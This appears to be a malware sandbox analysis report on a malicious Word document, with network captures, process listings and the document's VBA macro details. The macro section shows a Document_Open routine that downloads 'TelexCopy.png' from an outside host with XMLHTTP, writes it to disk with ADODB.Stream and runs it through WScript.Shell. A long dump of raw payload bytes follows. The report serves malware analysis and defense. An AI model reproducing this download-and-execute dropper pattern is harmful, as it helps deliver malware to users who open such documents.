2023-05-31 15:08:31 UTC	418	IN	Data Raw: ad 2c 20 70 6f 6d c3 a1 68 61 6a c3 ba 20 76 c3 a1 6d 20 70 72 69 68 6c c3 a1 73 69 c5 a5 20 73 61 2c 20 7a 6f 62 72 61 7a 6f 76 61 c5 a5 20 70 72 69 73 70 c3 b4 73 6f 62 65 6e c3 a9 20 72 65 6b 6c 61 6d 79 20 61 20 61 6e 61 6c 79 7a 6f 76 61 c5 a5 2c 20 61 6b 6f 20 64 6f 62 72 65 20 6e 61 c5 a1 65 20 77 65 62 79 20 66 75 6e 67 75 6a c3 ba 2e 20 c4 8e 61 6c c5 a1 69 65 20 69 6e 66 6f 72 6d c3 a1 63 69 65 20 6e c3 a1 6a 64 65 74 65 20 76 20 c4 8d 61 73 74 69 20 53 c3 ba 62 6f 72 79 20 63 6f 6f 6b 69 65 20 61 20 70 6f 64 6f 62 6e c3 a9 20 74 65 63 68 6e 6f 6c c3 b3 67 69 65 20 76 6f 20 3c 61 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f Data Ascii: , pomhaj vm prihlsi sa, zobrazova prispsoben reklamy a analyzova, ako dobre nae weby funguj. alie informcie njdete v asti Sbory cookie a podobn technolgie vo <a target='_blank' href='https://go.microsoft.com/fwlink/?
2023-05-31 15:08:31 UTC	426	IN	Data Raw: 6b 6f 72 70 6f 72 61 63 69 6a 61 20 4d 69 63 72 6f 73 6f 66 74 20 69 20 6b 6f 6a 65 20 6e 69 73 75 20 75 20 6e 6a 65 6e 6f 6d 20 76 6c 61 73 6e 69 c5 a1 74 76 75 2e 20 4e 61 20 70 72 69 6d 65 72 2c 20 6f 6e 69 20 73 65 20 6b 6f 72 69 73 74 65 20 7a 61 20 70 72 69 6b 75 70 6c 6a 61 6e 6a 65 20 69 6e 66 6f 72 6d 61 63 69 6a 61 20 6f 20 73 74 72 61 6e 69 63 61 6d 61 20 6b 6f 6a 65 20 70 6f 73 65 c4 87 75 6a 65 74 65 20 69 20 6f 20 74 6f 6d 65 20 6b 6f 6c 69 6b 6f 20 6a 65 20 6b 6c 69 6b 6f 76 61 20 70 6f 74 72 65 62 6e 6f 20 7a 61 20 69 7a 76 72 c5 a1 61 76 61 6e 6a 65 20 7a 61 64 61 74 6b 61 2e 20 4f 64 72 65 c4 91 65 6e 65 20 6b 6f 6c 61 c4 8d 69 c4 87 65 20 61 6e 61 6c 69 74 69 6b 65 20 6b 6f 72 69 73 74 69 6d 6f 20 7a 61 20 72 65 6b 6c 61 6d 69 72 61 6e Data Ascii: korporacija Microsoft i koje nisu u njenom vlasnitvu. Na primer, oni se koriste za prikupljanje informacija o stranicama koje poseujete i o tome koliko je klikova potrebno za izvravanje zadatka. Odreene kolaie analitike koristimo za reklamiran
2023-05-31 15:08:31 UTC	434	IN	Data Raw: 20 e0 b8 81 e0 b8 b2 e0 b8 a3 e0 b9 83 e0 b8 8a e0 b9 89 e0 b8 84 e0 b8 b8 e0 b8 81 e0 b8 81 e0 b8 b5 e0 b9 89 e0 b9 80 e0 b8 9e e0 b8 b7 e0 b9 88 e0 b8 ad e0 b8 99 e0 b8 b3 e0 b8 84 e0 b8 b8 e0 b8 93 e0 b9 80 e0 b8 82 e0 b9 89 e0 b8 b2 e0 b8 aa e0 b8 b9 e0 b9 88 e0 b8 a3 e0 b8 b0 e0 b8 9a e0 b8 9a 20 e0 b8 9a e0 b8 b1 e0 b8 99 e0 b8 97 e0 b8 b6 e0 b8 81 e0 b8 81 e0 b8 b2 e0 b8 a3 e0 b8 81 e0 b8 b3 e0 b8 ab e0 b8 99 e0 b8 94 e0 b8 a5 e0 b8 b1 e0 b8 81 e0 b8 a9 e0 b8 93 e0 b8 b0 e0 b8 a0 e0 b8 b2 e0 b8 a9 e0 b8 b2 e0 b8 82 e0 b8 ad e0 b8 87 e0 b8 84 e0 b8 b8 e0 b8 93 20 e0 b8 a1 e0 b8 ad e0 b8 9a e0 b8 9b e0 b8 a3 e0 b8 b0 e0 b8 aa e0 b8 9a e0 b8 81 e0 b8 b2 e0 b8 a3 e0 b8 93 e0 b9 8c e0 b8 81 e0 b8 b2 e0 b8 a3 e0 b9 83 e0 b8 8a e0 b9 89 e0 b8 87 e0 b8 b2 Data Ascii:
2023-05-31 15:08:31 UTC	442	IN	Data Raw: 65 79 61 Data Ascii: eya
2023-05-31 15:08:31 UTC	442	IN	Data Raw: 20 74 c4 b1 6b 6c 61 64 c4 b1 6b 74 61 6e 20 73 6f 6e 72 61 20 67 65 72 c3 a7 65 6b 6c 65 c5 9f 65 6e 20 73 61 74 c4 b1 6e 20 61 6c c4 b1 6d 6c 61 72 c4 b1 6e c4 b1 7a c4 b1 20 69 7a 6c 65 6d 65 6b 20 76 65 20 73 69 7a 65 20 64 61 68 61 20 61 6c 61 6b 61 6c c4 b1 20 72 65 6b 6c 61 6d 6c 61 72 20 67 c3 b6 73 74 65 72 6d 65 6b 20 69 c3 a7 69 6e 20 64 65 20 6b 75 6c 6c 61 6e c4 b1 6c c4 b1 72 2e 20 42 75 20 62 69 6c 67 69 6c 65 72 20 c3 b6 72 6e 65 c4 9f 69 6e 20 62 69 72 20 72 65 6b 6c 61 6d 61 20 74 c4 b1 6b 6c 61 64 c4 b1 c4 9f c4 b1 6e c4 b1 7a c4 b1 20 61 6c 67 c4 b1 6c 61 6d 61 6b 20 76 65 20 73 6f 73 79 61 6c 20 6d 65 64 79 61 64 61 6b 69 20 69 6c 67 69 20 61 6c 61 6e 6c 61 72 c4 b1 6e c4 b1 7a 61 20 76 65 20 77 65 62 20 73 69 74 65 73 69 20 74 61 72 Data Ascii: tkladktan sonra gerekleen satn almlarnz izlemek ve size daha alakal reklamlar gstermek iin de kullanlr. Bu bilgiler rnein bir reklama tkladnz alglamak ve sosyal medyadaki ilgi alanlarnza ve web sitesi tar
2023-05-31 15:08:31 UTC	450	IN	Data Raw: 3a 22 43 68 e1 ba a5 70 20 6e 68 e1 ba ad 6e 22 2c 72 65 6a 65 63 74 4c 61 62 65 6c 3a 22 54 e1 bb ab 20 63 68 e1 bb 91 69 22 2c 73 61 76 65 4c 61 62 65 6c 3a 22 4c c6 b0 75 20 74 68 61 79 20 c4 91 e1 bb 95 69 22 2c 72 65 73 65 74 4c 61 62 65 6c 3a 22 c4 90 e1 ba b7 74 20 6c e1 ba a1 69 20 74 e1 ba a5 74 20 63 e1 ba a3 22 2c 63 61 74 65 67 6f 72 69 65 73 3a 5b 7b 69 64 3a 22 63 30 22 2c 6e 61 6d 65 3a 22 42 e1 ba af 74 20 62 75 e1 bb 99 63 22 2c 64 65 73 63 3a 22 43 68 c3 ba 6e 67 20 74 c3 b4 69 20 73 e1 bb ad 20 64 e1 bb a5 6e 67 20 63 6f 6f 6b 69 65 20 62 e1 ba af 74 20 62 75 e1 bb 99 63 20 c4 91 e1 bb 83 20 74 68 e1 bb b1 63 20 68 69 e1 bb 87 6e 20 63 c3 a1 63 20 63 68 e1 bb a9 63 20 6e c4 83 6e 67 20 63 e1 ba a7 6e 20 74 68 69 e1 ba bf 74 20 63 e1 bb Data Ascii: :"Chp nhn",rejectLabel:"T chi",saveLabel:"Lu thay i",resetLabel:"t li tt c",categories:[{id:"c0",name:"Bt buc",desc:"Chng ti s dng cookie bt buc thc hin cc chc nng cn thit c
2023-05-31 15:08:31 UTC	458	IN	Data Raw: 65 73 2e 20 54 68 65 79 e2 80 99 72 65 20 75 73 65 64 20 74 6f 20 63 6f 6e 6e 65 63 74 20 79 6f 75 72 20 61 63 74 69 76 69 74 79 20 6f 6e 20 6f 75 72 20 77 65 62 73 69 74 65 73 20 74 6f 20 79 6f 75 72 20 73 6f 63 69 61 6c 20 6d 65 64 69 61 20 70 72 6f 66 69 6c 65 73 20 73 6f 20 74 68 65 20 61 64 73 20 61 6e 64 20 63 6f 6e 74 65 6e 74 20 79 6f 75 20 73 65 65 20 6f 6e 20 6f 75 72 20 77 65 62 73 69 74 65 73 20 61 6e 64 20 6f 6e 20 73 6f 63 69 61 6c 20 6d 65 64 69 61 20 77 69 6c 6c 20 62 65 74 74 65 72 20 72 65 66 6c 65 63 74 20 79 6f 75 72 20 69 6e 74 65 72 65 73 74 73 2e 20 22 7d 2c 7b 69 64 3a 22 63 33 22 2c 6e 61 6d 65 3a 22 41 64 76 65 72 74 69 73 69 6e 67 22 2c 64 65 73 63 3a 22 57 65 20 61 6e 64 20 74 68 69 72 64 20 70 61 72 74 69 65 73 20 75 73 65 20 Data Ascii: es. Theyre used to connect your activity on our websites to your social media profiles so the ads and content you see on our websites and on social media will better reflect your interests. "},{id:"c3",name:"Advertising",desc:"We and third parties use

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49226	142.250.203.110	443	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-05-31 15:08:37 UTC	459	OUT	GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=84.0.4147.135&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc HTTP/1.1 Host: clients2.google.com Connection: keep-alive X-Goog-Update-Interactivity: bg X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfm X-Goog-Update-Updater: chromecrx-84.0.4147.135 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-05-31 15:08:37 UTC	460	IN	HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-H5g6GV8QmRk9C_hITg2D-w' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 31 May 2023 15:08:37 GMT Content-Type: text/xml; charset=UTF-8 X-Daynum: 5994 X-Daystart: 29317 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2023-05-31 15:08:37 UTC	460	IN	Data Raw: 33 31 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 39 39 34 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 32 39 33 31 37 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22 Data Ascii: 31a<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5994" elapsed_seconds="29317"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
2023-05-31 15:08:37 UTC	461	IN	Data Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 70 6b 65 64 63 6a 6b 64 65 66 67 70 64 65 6c 70 62 63 6d 62 6d 65 6f 6d 63 6a 62 65 65 6d 66 6d 22 20 73 74 61 74 75 73 3d 22 65 72 72 6f 72 2d 75 6e 6b 6e 6f 77 6e Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app><app appid="pkedcjkdefgpdelpbcmbmeomcjbeemfm" status="error-unknown
2023-05-31 15:08:37 UTC	461	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49235	13.107.237.60	443	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-05-31 15:08:59 UTC	461	OUT	GET /scripts/c/ms.jsll-3.min.js HTTP/1.1 Host: js.monitor.azure.com Connection: keep-alive If-Modified-Since: Tue, 16 May 2023 17:35:05 GMT User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 If-None-Match: 0x8DB5633E2D59C23 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://learn.microsoft.com/en-us/samples/browse/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-05-31 15:08:59 UTC	462	IN	HTTP/1.1 304 Not Modified Cache-Control: public, max-age=1800, immutable, no-transform Content-Type: text/javascript; charset=utf-8 Content-MD5: /marBaXljvDfmTXcxJKiCA== Last-Modified: Tue, 16 May 2023 17:35:05 GMT ETag: 0x8DB5633E2D59C23 X-Cache: TCP_HIT x-ms-request-id: 033e1ecf-101e-0103-0acc-93ba51000000 x-ms-version: 2009-09-19 x-ms-meta-jssdkver: 3.2.11 x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-3.2.11.min.js Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * X-Azure-Ref-OriginShield: 0eF53ZAAAAADOFdYllX6tRpZ2OipuJuU4RlJBMjMxMDUwNDE4MDQ5AGYxY2E3M2Q0LTg4ODMtNGNhZi1hYmRjLWZlMmQ1NjdhZmI5Ng== X-Azure-Ref: 0C2N3ZAAAAABApMLhhBarSI90RQ63qoDDRlJBMzFFREdFMDQxNwBmMWNhNzNkNC04ODgzLTRjYWYtYWJkYy1mZTJkNTY3YWZiOTY= Date: Wed, 31 May 2023 15:08:58 GMT Connection: close

Target ID:	0
Start time:	17:08:58
Start date:	31/05/2023
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f1f0000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	4
Start time:	17:09:02
Start date:	31/05/2023
Path:	C:\Windows\System32\TelexCopy.png
Wow64 process (32bit):	true
Commandline:	TelexCopy.png
Imagebase:	0xc30000
File size:	329216 bytes
MD5 hash:	C332F541894866C101840B77191EFAA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 54%, ReversingLabs
Reputation:	low

Show Windows behavior

Target ID:	5
Start time:	17:09:04
Start date:	31/05/2023
Path:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized -- "http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=TelexCopy.png&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0
Imagebase:	0x13fb00000
File size:	1820656 bytes
MD5 hash:	6ACAE527E744C80997B25EF2A0485D5E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	6
Start time:	17:09:05
Start date:	31/05/2023
Path:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=968,1692114121093780899,121391818690164613,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1404 /prefetch:8
Imagebase:	0x13fb00000
File size:	1820656 bytes
MD5 hash:	6ACAE527E744C80997B25EF2A0485D5E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True
9	Private Const ERROR_SUCCESS as Long = 0
10	Private Const BINDF_GETNEWESTVERSION as Long = &H10
11	Private Const INTERNET_FLAG_RELOAD as Long = &H80000000

Executed Functions

Subroutine
Document_OpenAPIs: 11, Strings: 13, Number of lines: 39, Relevance: 74.039

APIs	Meta Information
CreateObject	CreateObject("Microsoft.XMLHTTP")
CreateObject	CreateObject("ADODB.Stream")
CreateObject	CreateObject("WScript.Shell")
Open	IXMLHTTPRequest.Open("GET","http://topvaluationfirms.com/TelexCopy.png",False)
send
Type
Open	Stream.Open()
write	Stream.write(?\xfffd\x03\x00\x04\x00?\x00\xfffd\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00????????????????4???????????$\x00\x00\x00?\x00O\x03??\x00\x00\x00\x00\xfffdAc0?\x04?\x00\x00\x00?\x05 \x00 \x05\x00@ \x00?\x00\x04\x00\x00\x00\x06\x00\x00\x00?\x05?\x00\x00\x00\x02?\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x05W\x00 \x05?\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x05\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x08\x00\x00\x00\x00\x00?\x00H\x00\x00\x00\x00\x00??t\x00?\x04 \x00?\x04?\x00\x00\x00\x00\x00\x00\x00 ???c\x00?\x00 \x05?\x00?\x04\x00\x00\x00\x00\x00\x00@????\x00\x0c\x00?\x05?\x00?\x05\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00?\x05\x00\x00H\x00\x02\x05?\x04?\x00\x03\x00\x0b??\x00?\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??\x01??\x14?\x00?\x03????\x17?\xfffd\x00??\x18??U\x00?\x19????\x02??\x14?\x00? ?? ???\x00??\x00 ??\x00\x06???\x00??\x02?j??\x00??\x1b??\x14?\x00?\x1c??&?\x13???k??\x0b?\x07??\x00?"?.?????\x00?/???\x00??\x00 ??\x00\x06??Z\x00\x06?????\x00?D???\x00??\x00 ??\x00\x06???\x00?k???\x00\x06??\x00?#??\x00???\x02?j??\x00??I??\x14?\x00?9??V?H??\x00 ?6????\x02?j??\x00??L??\x14?\x00????V?K??\x00 ?<????N??u??\x00??\x02?j??\x00??Q??\x14?\x00?T??&?D??N?k??\x01?\x19??&?B??\xfffd????\xfffd???\x00??\x00 ????\xfffd??N????\x01?\x19????\x02?j??\x00?????\x14?\x00?Z??V????\x00 ?W????\x02?j??\x00?????\x14?\x00?c??&?^??&?]???e??\x00???\x00 ??\xfffd?\x00???\x00???\x00 ??\x00?\xfffd??\x00???\x00?\x02+\x00\x01?`??\x01???????Z\x00?\x15?\x00^?\x00 ]\x03L\x00\x02??\x1a??\x1b??\x1c??\x1d????\x00?\x1e???\x1f??\x00???\x00????"??\x00?\x07??\x00???\x00 ??%?\x00??\x00????)A?????\x00 ?'????\x04??\x00?)?????\x00?\xfffd??\x00?-??\x00 ??\x00?+??\x00?,??\x00??/?????\x00?\xfffd??\x00????\x00?\xfffd??\x00?-??\x00 ?\x06???\x00 ?\x06??\x00 \x00?\x00\x02=??\x00\x00?\x04H\x00\x03??3??4???\x00\xfffd?\x00?7???8???9???\x00????\x00??????\x01\x0f\x00\x04??:???\x00??\x02+\x00\x01?`??\x02????????\x00?\x15?\x00^?\x00 ?\x03?\x00\x00\x00??\x00?\x03??>??\x00??\x00?\x05??@??\x00??\x00?\x07??A???\x00??\x00 ?\x03????\x00?D???\x00?\xfffd??\x00 ?\x03????\x00?G???\x00??\x00 ?\x03??\x00?\x19???\x00???C??\x00 ?\x04??\x00?E???\x00??\x00 ?\x04????\x00?G???\x00??\x00 ?\x05??\x01??\x00?D???\x00?E??\x00 ?\x05????\x00?G???\x00??\x00 ?\x05??\x01?\x19???\x00??\x00 ?\x05???\x00?K??\x00 ?\x06??M???\x00??\x00 ?\x06??\x00?P???\x00???C??\x00 ?\x06??\x01?E???\x00 ?\x00?\x02?F??\x00 ?\x06??H???\x00 \xfffd\x00??\x00?D???\x00?R??\x00 ?\x07????\x00?G???\x00??H???\x00??\x00 ?\x07???\x00?K??\x00 ?\x00?"??Q??\x00 ??\x00 ?\x00?\x02?F??\x00 ?T??\x07??\x00 ?T??\x06??\x00 ?T??\x03??\x00 ?T??\x04??\x00 ?T??\x05??\x00 ?\xfffd??\x00 ?\xfffd??\x00 ??\x05??\x00?V???W???\x00 \x00? ]\x00\x05?????\x00??\x00??z??\x00?????\x00??\???]?????A\x00??\x08A??\x00??\x00?\x04\x00?\x01?\x00\x00\x00?\x01?\x08??\x01? ??\x01? ??\x01?\x0b??\x01?\x0c??\x01? ??\x01?\x0e??\x01?\x0f??\x01?\x10??\x01?\x11??\x01?\x12??\x01?\x13??\x01?\x14??\x02+\x00\x01?`??\x15????????\x00?\x15?\x00^?\x00 ?\x06T\x00\x00\x00??\x00?\x16??_??\x00??\x00 ?\x16??B???\x00?u?" ?\xfffd\xfffd\x00?\x00?a???\x00???C??\x00 ?\x16??\x00?E???\x00???F??\x00 ?\x16??H???\x00????\x00 ?\x17????\x00?D???\x00??b???\x00????\x00 ?\x17??\x00??F??\x00 ?\x17??c???\x00??\x00 ?\x17??d??"??\x00??\x00?R???\x18???\x00?f???\x00??F??\x00 ??\x00 ?T??\x16??\x00 ?T??\x17??\x00 ??\x00 ????\x00 ??\x00 ??\x00 ?X??\x00?\x03Z\x00\x06???\x00?k???\x00\x06?'??\x00?\x12?\x02?m??\x00 ?)??n???\x00??\x00 ?+??n??\x00?\x05\xfffd\x00\x07???\x18??#??\x00?o??\x01?p??B????\x03???q???\x18??\x00??\x00?(??\x00?u??\x00??\x1e?\x03??????\x00???\x00???\x00?(??\x00?u??\x00??\x1e?\x03??????\x00???\x00???\x00?(??\x00?u??\x00??\x1e?\x03??????\x00???\x00???\x02~\x00\x00\x00??\x00?u??\x00 ?#??\x01?\x19???\x00?u??\x00 ?&??\x01?\x19???\x00?u??\x00 ?)??n???\x00??\x00 ?+??n??\x00?\x06?\x00\x08????\x00?r??\x00 ?(??t???\x00?u??v??\x04?w???\x00?u??v???\x00 ???(??\x00??\x00????\x00 ?(??\x00??\x00??x?????\x00?u??v??\x04?w???\x00?u??v??\x00?x?????\x00?u??v??\x04?w???\x00?u??v??\x00?x?????\x00?u??v??\x04?w???\x00?u??v??\x00?x?????\x00?u??v??\x04?w???\x00?u??v???\x00 ?\x04??\x00?(??\x05?y???\x19??\x00??{???\x00??\x00?r??\x08A?????\x00?}????\x05?\|??\x00??????\x00?}????\x05?\|??\x00??????\x00?}????\x05?\|??\x00??\x00???\x00?????????\x00?\x04\xfffd\x00 ???\x00\x06?\x18????\xfffd\x00??RA??\x05???#??\x00???\x06???$??\x00???\x06???%??\x00???\x06???&??\x00???\x06????\x00?(????\x06??\x00???\x00?z???\x00??\x06?????\x00\x06?\x13?\x00\x00?\x05O\x00 ???\x00\x06?\x18????\x06?\x01??\x00?(??\x00?u??\x00??\x1a?\x06??????\x00??\x00????"??\x00?[??\x07???\x00????\x00\x00??\x00???????\x00?(????????\x00?(????????\x00?(????????\x00?(????????'??\x00????????"??\x00??????\xfffd???\x19??\x00?????????\x00??\x14???\x00\x06?\x00]\x03?\x00\x00\x00\x00?"??(??\x00??\x00????\x00????\x00????\x00?\x19???\x00??\x00?r?????\x00????\x04????\x00?}??\x00 ?$??(??\x00??\x00????\x00????\x00????\x00?\x19???\x00??\x00?r?????\x00????\x04????\x00?}??\x00 ?&??(??\x00??\x00????\x00????\x00????\x00?\x19???\x00??\x00?r?????\x00????\x04????\x00?}??\x00 ??\x00\xfffd?)??n???\x00??\x00 ?+??n???\x00\x00\x00\x01\x00T\x00t\x00\x05\x00\x08A?\x05\xfffd\x00\x0b???\x00?(??\x00?u??\x00??\x17?\x06??????\x00???\x08??\x00?(??\x00??????????J?\x08??\x00?(??\x08?y???\x19??\x00????????\x00??\x14???\x00\x06?\x00?\x01\x0f\x00\x0c??U???\x00??\x02+\x00\x01?`??\x1b????????\x00?\x15?\x00^?\x00 ?\x04?\x00\x00\x00??\x00?\x1c??=??\x00??\x00?\x1e??=??\x00??\x00? ??=??\x00??\x00?"??>??\x00??\x00?$??>??\x00??\x00?&??>??\x00??\x00?(?????\x00??\x00??????\x00??\x00?,?????\x00??\x00?????\x00 ?\x1c??B???\x00???C??\x00 ?\x1c??\x00?E???\x00???F??\x00 ?\x1c??H???\x00????\x00 ?\x1d??B???\x00 ?\x00??\x00?D???\x00????\x00 ?\x1d????\x00?G???\x00??\x00 ?\x1d?? ?\x19???\x00??\x00 ?\x1e??\x01??C??\x00 ?\x1e?? ?E???\x00???F??\x00 ?\x1e??H???\x00????\x00 ?\x1f??B???\x00 ?\x00??\x00?D???\x00????\x00 ?\x1f????\x00?G???\x00??\x00 ?\x1f?? ?\x19???\x00??\x00 ? ??\x02??C??\x00 ? ?? ?E???\x00???F??\x00 ? ??H???\x00????\x00 ?!??B???\x00???C??\x00 ?!?? ?E???\x00???F??\x00 ?!??H???\x00????\x00 ?"????\x00?D???\x00????\x00 ?"??I???\x00???F??\x00 ?"??H???\x00????\x00 ?#??\x00??C??\x00 ?#?? ?E???\x00??\x00 ?#????\x00?G???\x00??\x00 ?$??\x00?f???\x00 ?\x00??\x00?D???\x00????\x00 ?$??\x01??F??\x00 ?$??H???\x00????\x00 ?%??\x00??C??\x00 ?%?? ?E???\x00 g\x00??\x00?G???\x00??H???\x00????\x00 ?&??\x02??C??\x00 ?&?? ?E???\x00???F??\x00 ?&???\x00 ?'????\x00?D???\x00????\x00 ?'??I???\x00???F??\x00 ?'???\x00 ?(??\xfffd???\x00??\x00 ?(??\xfffd???\x00???C??\x00 ?(?? ?E???\x00??\x00 ?(??\x02 U\x00?\x00?G???\x00??H???\x00??\x18??\x00?????\x00 \xfffd\x00@\x00 \xfffd\x00?\x00?f???\x00??i\x00?\x00?D???\x00????\x00 ?)????\x00?G???\x00??H???\x00????\x00 ?)??J???\x00??\x15??\x00?L???\x00 \xfffd\x00?\x00 \xfffd\x00?\x00?f???\x00??i\x00?\x00?D???\x00????\x00 ?????\x00?G???\x00??H???\x00????\x00 ???J???\x00??\x16??\x00?L???\x00 \xfffd\x00@\x00 \xfffd\x00?\x00?f???\x00 ?\x00?\x01?C??\x00 ?+?? ?E???\x00???F??\x00 ?+???\x00 ?+??\x0b?\x19???\x00??\x00 ?+???\x00?K??\x00 